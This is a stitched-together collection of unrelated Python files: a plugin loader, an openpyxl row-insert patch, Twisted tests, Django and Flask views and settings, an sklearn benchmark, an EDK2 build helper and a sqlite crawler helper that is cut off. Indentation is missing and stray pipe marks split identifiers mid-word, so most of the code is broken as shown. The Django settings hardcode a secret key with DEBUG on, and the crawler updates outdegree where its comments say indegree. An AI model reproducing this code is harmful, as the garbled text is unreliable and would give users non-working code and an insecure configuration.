import logging
logger = logging.getLogger(__name__)
from sdk.constants import *
from sdk.utils import load_class
from sdk.plugin.base import BasePlugin
from sdk.plugin.config import BasePluginConfig
class FSPluginHelper(object):
"""
Filesystem Plugin helper functions
"""
def __init__(self, app):
super(FSPluginHelper, self).__init__()
self.plugins_dir = app.config.plugins_dir
# make sure plugins dir is in python search path
sys.path.insert(1, self.plugins_dir)
def __is_valid_plugin_module(self, plugin_name):
# check if "plugin.py" under plugin package
PLUGIN_FILE = os.path.join(self.plugins_dir, "{0}".format(plugin_name.lower()), "plugin.py")
if not os.path.exists(PLUGIN_FILE):
print "no plugin.py file under {0} plugin package".format(plugin_name)
return False
return True
def fs_get_plugin_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
#if not self.__is_valid_plugin_module(plugin_name):
# print "Invalid plugin module: {0}".format(plugin_name)
# return None
try:
# here must convert plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CLASS_NAME)
if not issubclass(cls, BasePlugin):
print "Object: {0} is not a subclass of BasePlugin".format(cls)
return None
except Exception,e:
raise e
return cls
def fs_get_plugin_config_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
if not self.__is_valid_plugin_module(plugin_name):
print "Invalid plugin module: {0}".format(plugin_name)
return None
try:
# here must convert plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CONFIG_CLASS_NAME)
if not issubclass(cls, BasePluginConfig):
| print "Object: {0} is not a subclass of BasePluginConfig".format(cls)
return None
except Exception,e:
print "Warning: No {0} plugin config class becau | se of: {1}".format(plugin_name, e)
return None
return cls
def __build_meta_dict(self, plugin_instance):
"""
Build meta dict from plugin instance as below:
{ 'name':'x','version': '0.1', ...}
@param: plugin instance
@return: meta dict
"""
meta_dict = {}
for k in BasePlugin.meta_keys:
meta_dict[k] = plugin_instance.__class__.__dict__[k]
return meta_dict
def fs_get_meta_all(self):
"""
Get all plugins meta list from filesystem
"""
meta_list = []
all_plugin_instances = self.fs_get_plugin_instances_all()
for pinstance in all_plugin_instances:
d = self.__build_meta_dict(pinstance)
meta_list.append(d)
return meta_list
def fs_get_meta(self, plugin_name):
"""
Get specific plugin's meta dict by plugin name
"""
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if not plugin_instance:
return {}
return self.__build_meta_dict(plugin_instance)
def fs_get_plugin_instance(self, plugin_name):
plugin_class = self.fs_get_plugin_class(plugin_name)
if not plugin_class:
return None
try:
plugin_instance = plugin_class()
except Exception,e:
raise e
return plugin_instance
def fs_get_plugin_instances_all(self):
"""
Probe plugin package deployed in filesystem and try to initialize plugin instances
@return: the list of plugin instance
"""
# get the top-level dir under plugin parent dir
plugin_instance_list = []
plugin_name_list = os.walk(self.plugins_dir).next()[1]
for plugin_name in plugin_name_list:
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if plugin_instance:
plugin_instance_list.append(plugin_instance)
return plugin_instance_list
|
#!/usr/bin/env python
import copy
import datetime as dt
import re
from decimal import Decimal, InvalidOperation
from openpyxl import *
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.worksheet import Worksheet
# OPENPYXL WITH INSERT ROW
# ----------------------------------------------------------------------------------------------------
def insert_rows(self, row_idx, cnt, above=False, copy_style=True, fill_formulae=True):
"""Inserts new (empty) rows into worksheet at specified row index.
:param self: Class object
:param row_idx: Row index specifying where to insert new rows.
:param cnt: Number of rows to insert.
:param above: Set True to insert rows above specified row index.
:param copy_style: Set True if new rows should copy style of immediately above row.
:param fill_formulae: Set True if new rows should take on formula from immediately above row, filled with references new to rows.
Usage:
* insert_rows(2, 10, above=True, copy_style=False)
"""
CELL_RE = re.compile("(?P<col>\$?[A-Z]+)(?P<row>\$?\d+)")
row_idx = row_idx - 1 if above else row_idx
def re | place(m):
row = m.group('row')
prefix = "$" if row.find("$") != -1 else ""
row = int(row.replace("$", ""))
row += cnt if row > row_idx else 0
return m.group('col') + prefix + str(row)
# First, we shift all cells down cnt rows...
old_cells = set()
old_fas = set()
new_cells = dict()
new | _fas = dict()
for c in self._cells.values():
old_coor = c.coordinate
# Shift all references to anything below row_idx
if c.data_type == Cell.TYPE_FORMULA:
c.value = CELL_RE.sub(
replace,
c.value
)
# Here, we need to properly update the formula references to reflect new row indices
if old_coor in self.formula_attributes and 'ref' in self.formula_attributes[old_coor]:
self.formula_attributes[old_coor]['ref'] = CELL_RE.sub(
replace,
self.formula_attributes[old_coor]['ref']
)
# Do the magic to set up our actual shift
if c.row > row_idx:
old_coor = c.coordinate
old_cells.add((c.row, c.col_idx))
c.row += cnt
new_cells[(c.row, c.col_idx)] = c
if old_coor in self.formula_attributes:
old_fas.add(old_coor)
fa = self.formula_attributes[old_coor].copy()
new_fas[c.coordinate] = fa
for coor in old_cells:
del self._cells[coor]
self._cells.update(new_cells)
for fa in old_fas:
del self.formula_attributes[fa]
self.formula_attributes.update(new_fas)
# Next, we need to shift all the Row Dimensions below our new rows down by cnt...
for row in range(len(self.row_dimensions) - 1 + cnt, row_idx + cnt, -1):
new_rd = copy.copy(self.row_dimensions[row - cnt])
new_rd.index = row
self.row_dimensions[row] = new_rd
del self.row_dimensions[row - cnt]
# Now, create our new rows, with all the pretty cells
row_idx += 1
for row in range(row_idx, row_idx + cnt):
# Create a Row Dimension for our new row
new_rd = copy.copy(self.row_dimensions[row - 1])
new_rd.index = row
self.row_dimensions[row] = new_rd
for col in range(1, self.max_column):
col = get_column_letter(col)
cell = self.cell('%s%d' % (col, row))
cell.value = None
source = self.cell('%s%d' % (col, row - 1))
if copy_style:
cell.number_format = source.number_format
cell.font = source.font.copy()
cell.alignment = source.alignment.copy()
cell.border = source.border.copy()
cell.fill = source.fill.copy()
if fill_formulae and source.data_type == Cell.TYPE_FORMULA:
s_coor = source.coordinate
if s_coor in self.formula_attributes and 'ref' not in self.formula_attributes[s_coor]:
fa = self.formula_attributes[s_coor].copy()
self.formula_attributes[cell.coordinate] = fa
# print("Copying formula from cell %s%d to %s%d"%(col,row-1,col,row))
cell.value = re.sub(
"(\$?[A-Z]{1,3}\$?)%d" % (row - 1),
lambda m: m.group(1) + str(row),
source.value
)
cell.data_type = Cell.TYPE_FORMULA
# Check for Merged Cell Ranges that need to be expanded to contain new cells
for cr_idx, cr in enumerate(self.merged_cell_ranges):
self.merged_cell_ranges[cr_idx] = CELL_RE.sub(
replace,
cr
)
Worksheet.insert_rows = insert_rows
# ----------------------------------------------------------------------------------------------------
# END OPENPYXL
# MISC
# ----------------------------------------------------------------------------------------------------
def to_bool(data):
if isinstance(data, str):
data = data.lower()
if data == "0" or data == "false":
return False
elif data == "1" or data == "true":
return True
return NotImplemented
def to_date_format(string):
# remove time element
string = string.split(' ')[0]
try:
return dt.datetime.strptime(string, '%d/%m/%Y')
except ValueError:
return None
def to_dec(data):
try:
return Decimal(data)
except InvalidOperation:
return Decimal('0')
# ----------------------------------------------------------------------------------------------------
# END MISC
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.internet import task, reactor, defer
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
def __init__(self, clock, *a, **kw):
super(TestableLoopingCall, self).__init__(*a, **kw)
self._callLater = lambda delay: clock.callLater(delay, self)
self._seconds = clock.seconds
class FakeDelayedCall(object):
def __init__(self, when, clock, what, a, kw):
self.clock = clock
self.when = when
self.what = what
self.a = a
self.kw = kw
def __call__(self):
return self.what(*self.a, **self.kw)
def __repr__(self):
return "<FakeDelayedCall of %r>" % (self.what,)
def cancel(self):
self.clock.calls.remove((self.when, self))
class Clock(object):
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
return self.rightNow
def callLater(self, when, what, *a, **kw):
self.calls.append((self.seconds() + when, FakeDelayedCall(self.seconds() + when, self, what, a, kw)))
return self.calls[-1][1]
def adjust(self, amount):
self.rightNow += amount
def runUntilCurrent(self):
while self.calls and self.calls[0][0] <= self.seconds():
when, call = self.calls.pop(0)
call()
def pump(self, timings):
timings = list(timings)
timings.reverse()
self.calls.sort()
while timings:
self.adjust(timings.pop())
self.runUntilCurrent()
class TestException(Exception):
pass
class LoopTestCase(unittest.TestCase):
def testBasicFunction(self):
# Arrange to have time advanced enough so that our function is
# called a few times.
# Only need to go to 2.5 to get 3 calls, since the first call
# happens before any time has elapsed.
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
def foo(a, b, c=None, d=None):
L.append((a, b, c, d))
lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
D = lc.start(0.1)
theResult = []
def saveResult(result):
theResult.append(result)
D.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 3,
"got %d iterations, not 3" % (len(L),))
for (a, b, c, d) in L:
self.assertEquals(a, "a")
self.assertEquals(b, "b")
self.assertEquals(c, None)
self.assertEquals(d, "d")
lc.stop()
self.assertIdentical(theResult[0], lc)
# Make sure it isn't planning to do anything further.
self.failIf(clock.calls)
def testDelayedStart(self):
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
lc = TestableLoopingCall(clock, L.append, None)
d = lc.start(0.1, now=False)
theResult = []
def saveResult(result):
theResult.append(result)
d.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 2,
"got %d iterations, not 2" % (len(L),))
lc.stop()
self.assertIdentical(theResult[0], lc)
self.failIf(clock.calls)
def testBadDelay(self):
lc = task.LoopingCall(lambda: None)
self.assertRaises(ValueError, lc.start, -1)
# Make sure that LoopingCall.stop() prevents any subsequent calls.
def _stoppingTest(self, delay):
ran = []
def foo():
ran.append(None)
clock = Clock()
lc = TestableLoopingCall(clock, foo)
d = lc.start(delay, now=False)
lc.stop()
self.failIf(ran)
self.failIf(clock.calls)
def testStopAtOnce(self):
return self._stoppingTest(0)
def testStoppingBeforeDelayedStart(self):
return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
# | Slightly inferior tests which exercise interactions with an actual
# reactor.
def testFailure(self):
def foo(x):
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testFailAndStop(self):
def foo(x):
lc.stop()
raise TestException(x)
| lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testEveryIteration(self):
ran = []
def foo():
ran.append(None)
if len(ran) > 5:
lc.stop()
lc = task.LoopingCall(foo)
d = lc.start(0)
def stopped(ign):
self.assertEquals(len(ran), 6)
return d.addCallback(stopped)
def testStopAtOnceLater(self):
# Ensure that even when LoopingCall.stop() is called from a
# reactor callback, it still prevents any subsequent calls.
d = defer.Deferred()
def foo():
d.errback(failure.DefaultException(
"This task also should never get called."))
self._lc = task.LoopingCall(foo)
self._lc.start(1, now=False)
reactor.callLater(0, self._callback_for_testStopAtOnceLater, d)
return d
def _callback_for_testStopAtOnceLater(self, d):
self._lc.stop()
reactor.callLater(0, d.callback, "success")
def testWaitDeferred(self):
# Tests if the callable isn't scheduled again before the returned
# deferred has fired.
timings = [0.2, 0.8]
clock = Clock()
def foo():
d = defer.Deferred()
d.addCallback(lambda _: lc.stop())
clock.callLater(1, d.callback, None)
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(0.2)
clock.pump(timings)
self.failIf(clock.calls)
def testFailurePropagation(self):
# Tests if the failure of the errback of the deferred returned by the
# callable is propagated to the lc errback.
#
# To make sure this test does not hang trial when LoopingCall does not
# wait for the callable's deferred, it also checks there are no
# calls in the clock's callLater queue.
timings = [0.3]
clock = Clock()
def foo():
d = defer.Deferred()
clock.callLater(0.3, d.errback, TestException())
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(1)
self.assertFailure(d, TestException)
clock.pump(timings)
self.failIf(clock.calls)
return d
|
class Object:
def __init__(se | lf, name):
self._name = name
@property
def name(self):
return self._name | |
"""
This app is a simple extension of built in auth_views which overrides login and
logout to provide messages on successful login/out.
"""
from django.contrib.auth import views as auth_views
from django.utils.translation import ugettext as _
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm
from django.contrib import messages
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from btb.utils import can_edit_user
from accounts.forms import OptionalEmailForm
from registration.backends.simple.views import RegistrationView
def login(request, *args, **kwargs):
kwargs['extra_context'] = {
'reg_form': OptionalEmailForm(auto_id="regid_%s")
}
response = auth_views.login(request, *args, **kwargs)
return response
def logout(request, *args, **kwargs):
messages.success(request, _("Successfully logged out."))
response = auth_views.logout(request, *args, **kwargs)
return response
def check_username_availability(request):
username = request.GET.get | ('username', None)
if not username:
response = HttpResponse('{"result": null}')
if User.objects.filter(username=username).exists():
response = HttpResponse('{"result": "taken"}')
else:
response = HttpResponse('{"result": "available"}')
response['Content-Type'] = "application/json"
return response
def change_password(request, user_id):
"""
Change the password of the user with the given user_id. Checks for
permission to ch | ange users.
"""
if not can_edit_user(request.user, user_id):
raise PermissionDenied
if request.user.id == int(user_id):
Form = PasswordChangeForm
else:
Form = SetPasswordForm
user = User.objects.get(id=user_id)
if request.POST:
form = Form(user, request.POST)
if form.is_valid():
form.save()
messages.success(request, _("Password changed successfully."))
return HttpResponseRedirect(reverse("profiles.profile_edit", args=[user_id]))
else:
form = Form(request.user)
return render(request, "registration/password_change_form.html", {
'form': form,
'change_user': user,
})
@login_required
def welcome(request):
return render(request, 'registration/welcome.html')
class OptionalEmailRegistrationView(RegistrationView):
form_class = OptionalEmailForm
def get_success_url(self, user):
if 'after_login' in self.request.session:
return self.request.session.pop('after_login')
return reverse("accounts-post-registration")
|
import datetime
from flask import abort, render_template, request, redirect, Response
import ctrl.blog
from . import handlers
@handlers.route('/blog')
def blog_index():
pageNo = 0
if request.args.get('page'):
pageNo = int(request.args.get('page'))
if pageNo < 0:
pageNo = 0
posts = ctrl.blog.getPosts(pageNo)
if not posts and pageNo > 0:
redirect('/blog?page=%d' % (pageNo - 1)) |
return render_template('blog/index.html', posts=posts, pageNo=pageNo)
@handlers.route('/blog/<year>/<month>/<slug>')
def blog_post(year, month, slug):
post = ctrl.blog.getPostBySlug(int(year), int(month), slug)
if not post:
abort(404)
return render_template('blog/post.html', post=post)
@handlers.route('/blog/rss')
def blog_rss():
posts = ctrl.blo | g.getPosts(0, 15)
pubDate = datetime.time()
if posts and len(posts) > 0:
pubDate = posts[0].posted
return Response(
render_template('blog/rss.xml', posts=posts,
pubDate=pubDate.strftime('%a, %d %b %Y %H:%M:%S GMT')),
content_type='application/rss+xml')
|
# Django settings for flexy project.
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django_mongodb_engine',
'NAME': 'sheesh',
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = u'54c3c2ebf0d6142f25b84dce'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.Fi | leSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '9j(dx#&1&_s5^a71r4%+ct64(22rv6sm@ly07%1fwu4ta##&q)'
| # List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.messages.context_processors.messages',
'django.contrib.auth.context_processors.auth',
)
ROOT_URLCONF = 'flexy.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'flexy.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates')
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'bootstrap3',
'app',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
"""
Benchmark for SGD regression
Compares SGD regression against coordinate descent and Ridge
on synthetik data.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# License: BSD Style.
import numpy as np
import pylab as pl
import gc
from time import time
from sklearn.linear_model import Ridge, SGDRegressor, ElasticNet
from sklearn.metrics import mean_squared_error
from sklearn.datasets.samples_generator import make_regression
if __name__ == "__main__":
list_n_samples = np.linspace(100, 10000, 5).astype(np.int)
list_n_features = [10, 100, 1000]
n_test = 1000
noise = 0.1
alpha = 0.01
sgd_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
elnet_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
ridge_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
for i, n_train in enumerate(list_n_samples):
for j, n_features in enumerate(list_n_features):
X, y, coef = make_regression(
n | _samples=n_train + n_test, n_features=n_features,
noise=noise, coef=True)
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
print("=======================")
print("Round %d %d" % (i, j))
print("n_features:", n_features)
print("n_samples:", n_train)
# Shuffle data
idx = np.arange(n_ | train)
np.random.seed(13)
np.random.shuffle(idx)
X_train = X_train[idx]
y_train = y_train[idx]
std = X_train.std(axis=0)
mean = X_train.mean(axis=0)
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
std = y_train.std(axis=0)
mean = y_train.mean(axis=0)
y_train = (y_train - mean) / std
y_test = (y_test - mean) / std
gc.collect()
print("- benching ElasticNet")
clf = ElasticNet(alpha=alpha, rho=0.5, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
elnet_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
elnet_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching SGD")
n_iter = np.ceil(10 ** 4.0 / n_train)
clf = SGDRegressor(alpha=alpha, fit_intercept=False,
n_iter=n_iter, learning_rate="invscaling",
eta0=.01, power_t=0.25)
tstart = time()
clf.fit(X_train, y_train)
sgd_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
sgd_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching RidgeRegression")
clf = Ridge(alpha=alpha, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
ridge_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
ridge_results[i, j, 1] = time() - tstart
# Plot results
i = 0
m = len(list_n_features)
pl.figure(figsize=(5 * 2, 4 * m))
for j in range(m):
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 0]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 0]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 0]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("RMSE")
pl.title("Test error - %d features" % list_n_features[j])
i += 1
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 1]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 1]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 1]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("Time [sec]")
pl.title("Training time - %d features" % list_n_features[j])
i += 1
pl.subplots_adjust(hspace=.30)
pl.show()
|
from django.db import models
from django.core.urlresolvers import reverse
from django.conf import settings
import misaka
from groups.models import Group
# Create your models here.
# POSTS MODELS.PY
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
user = model | s.ForeignKey(User, related_name='posts')
created_at = models.DateTimeField(auto_now=True)
message = models.TextField()
message_html = mod | els.TextField(editable=False)
group = models.ForeignKey(Group, related_name='posts', null=True, blank=True)
def __str__(self):
return self.message
def save(self, *args, **kwargs):
self.message_html = misaka.html(self.message)
super().save(*args, **kwargs)
def get_absolute_url(self):
return reverse('posts:single', kwargs={'username': self.user.username, 'pk': self.pk})
class Meta:
ordering = ['-created_at']
unique_together = ['user', 'message'] |
## @file
# process compress section generation
#
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
from . import Section
import subprocess
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import CompressSectionClassObject
from Common.DataType import *
## generate compress section
#
#
class CompressSection (CompressSectionClassObject) :
## compress types: PI standard and non PI standard
CompTypeDict = {
'PI_STD' : 'PI_STD',
'PI_NONE' : 'PI_NONE'
}
## The constructor
#
# @param self The object pointer
#
def __init__(self):
CompressSectionClassObject.__init__(self)
## GenSection() method
#
# Generate compressed section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf = None, Dict = {}, IsMakefile = False):
if FfsInf is not None:
self.CompType = FfsInf.__ExtendMacro__(self.CompType)
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
SectFiles = tuple()
SectAlign = []
Index = 0
MaxAlign = None
for Sect in self.SectionList:
Index = Index + 1
SecIndex = '%s.%d' %(SecNum, Index)
ReturnSectList, AlignValue = Sect.GenSection(OutputPath, ModuleName, SecIndex, KeyStringList, FfsInf, Dict, IsMakefile=IsMakefile)
if AlignValue is not None:
if MaxAlign is None:
MaxAlign = AlignValue
if GenFdsGlobalVariable.Ge | tAlignment (AlignValue) > GenFdsGlobalVariable.GetAlignment (MaxAlign):
MaxAlign = AlignValue
if ReturnSectList != []:
if AlignValue is None:
AlignValue = "1"
fo | r FileData in ReturnSectList:
SectFiles += (FileData,)
SectAlign.append(AlignValue)
OutputFile = OutputPath + \
os.sep + \
ModuleName + \
SUP_MODULE_SEC + \
SecNum + \
SectionSuffix['COMPRESS']
OutputFile = os.path.normpath(OutputFile)
DummyFile = OutputFile + '.dummy'
GenFdsGlobalVariable.GenerateSection(DummyFile, SectFiles, InputAlign=SectAlign, IsMakefile=IsMakefile)
GenFdsGlobalVariable.GenerateSection(OutputFile, [DummyFile], Section.Section.SectionType['COMPRESS'],
CompressionType=self.CompTypeDict[self.CompType], IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
|
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
def __init__(self):
'''创建表'''
self.conn = sqlite3.connect("./items.db")
if VERBOSE:
print 'Database connection OPEN.'
# Domain 表
self.conn.execute(CTABLE_DOMAIN)
# Website 表
self.conn.execute(CTABLE_WEBSITE)
# Rule 表
self.conn.execute(CTABLE_RULESETS)
self.conn.commit()
if VERBOSE:
cur = self.conn.cursor()
print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
def close(self):
'''关闭与数据库的连接'''
if VERBOSE:
print 'Database connection CLOSE.'
self.conn.close()
def insertDomain(self, domain, indegree=0, outdegree=0):
'''增加一个域名'''
cur = self.conn.cursor()
cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
# 写入到文件中
self.conn.commit()
def insertRuleset(self, ruleset, domain):
'''增加一个robots.txt规则集'''
cur = self.conn.cursor()
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
# 写入到文件
self.conn.commit()
def insertWebsite(self, url, domain):
'''增加一个网页,标记为未访问,并对相应的domain增加其入度'''
cur = self.conn.cursor()
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
result = cur.fetchone()
if not result:
# 未有对应domain记录, 先创建domain, 把入度设为1
if VERBOSE:
print 'Spot Domain:',domain
self.insertDomain(domain, indegree=1)
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
else:
did = result[0]
# 对应的domain记录已经存在, 对其入度+1
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
# 写入到文件
self.conn.commit()
def updateInfo(self, item, newlinks, oldlinks):
'''爬虫爬完之后 | 对数据库 | 内容进行更新'''
cur = self.conn.cursor()
cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
wid, did = cur.fetchone()
# website记录更新
cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
# 对应的domain记录中出度也需要更新
cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
# 对该网页中所有链接涉及的记录进行更新
# 外部判断未出现过的链接
for link,domain in newlinks:
self.insertWebsite(link, domain)
# 外部判断出现过的链接
for link,domain in oldlinks:
# 对对应的domain记录入度增加
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
# 写入到文件
self.conn.commit()
def robotsrulesetOfDomain(self, domain):
'''检查domain是否在数据库中,
否 --> (False, None)
是 --> (True, 数据库中存储的robots.txt内容)
'''
exist = False
cur = self.conn.cursor()
# 是否存在
